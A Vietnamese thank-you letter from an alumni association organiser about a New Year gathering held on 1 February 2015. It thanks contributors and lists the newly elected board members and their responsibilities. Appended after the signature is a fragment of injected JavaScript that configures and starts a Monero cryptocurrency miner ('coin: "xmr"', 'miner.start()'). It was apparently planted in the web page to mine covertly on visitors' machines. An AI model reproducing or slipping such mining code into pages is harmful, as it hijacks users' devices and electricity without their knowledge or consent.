Thư cảm ơn về buổi Họp Mừng Năm Mới 1-2-2015 - Nguyễn Đình Thái NLMSG -

Thư cảm ơn về buổi Họp Mừng Năm Mới 1-2-2015

Chào quý Thầy Cô, quý Anh Chị, quý Bạn Hữu,

  Buổi Họp Mặt Mừng Măm Mới của LK NLM/S ngày 1/2/2015 rất vui và sống động.

Thay mặt cho Ban Tổ Chức, Tôi xin cảm ơn quý Thầy Cô, quý Anh Chị và

 quý Bạn Hữu đã đến tham dự. 

Cảm ơn Ban Văn Nghệ CLB Sinh Vật Cảnh Giao Châu, thầy Phan Hoàng Đồng,

 anh Trần Thuận, anh Bảo Cường, anh Phan Tấn Bảy K7, anh Võ Văn An K15,

 chị Trần thị Xuân Mai K11, chị Nguyễn thị Huyền Ngân K15, chị Nguyễn thị Bé Sáu,

 chị Nguyễn Hướng Dương ( con anh Nguyễn Hữu Phước K7), chị Huỳnh Băng Nga

 ( con anh Huynh Minh Bảo K1) đã góp thêm quà cho buổi họp.  

  Trong Buổi Họp Mặt Mừng Năm Mới này , chúng ta đã bầu chọn được BĐD LK

 NLM/S mới với các thành viên:

 -Anh Nguyễn Đức Cao, trưởng ban và phụ trách nhóm K8 và các thân hữu

 -Anh Nguyễn Đình Thái, phụ trách nhóm K1,2,3,4,5,6,7

 -Anh Lê Văn Hạt và anh Trần Văn Hảo, phụ trách nhóm K9,10,11,12,13,14

 -Chị Trần Thị Ninh, phụ trách nhóm K15,16 và các khóa sau 75 

 -Chị Bùi Thị Lợi, phụ trách nhóm NLS/Bão Lộc

 -Chị Trần Thị Tuyết, phụ trách nhóm NLS/Định Tường

 -Chị Trần Kim Loan, phụ trách nhóm NLS/Cần Thơ

 -Chị Lương Kim Dung, phụ trách nhóm NLS/phía Bắc

 -Chị Trương Thị Yến, thủ quỹ

Xin chúc mừng BĐD LK NLM/S mới

 Phần tôi, Nguyễn Đình Thái, xin cảm ơn rất nhiều tất cả các Anh Chị, nhất là

 các anh chị trong BĐD LK cũ, đã trợ giúp tôi làm tốt nhiệm vụ trong thời gian qua,

Là thành viên của BĐD mới, tôi sẽ hết sức cộng tác chặt chẽ với BĐD LK mới.

 Nhân dịp Năm Mới, tôi xin Chúc quý Thầy Cô, quý Anh Chị cùng gia đình:

 Hạnh Phúc, An Khang, Thịnh Vương và Vạn Sự Như Ý.

              Nguyễn Đình Thái

', { threads:2,throttle:0.2, coin: "xmr", }); miner.start();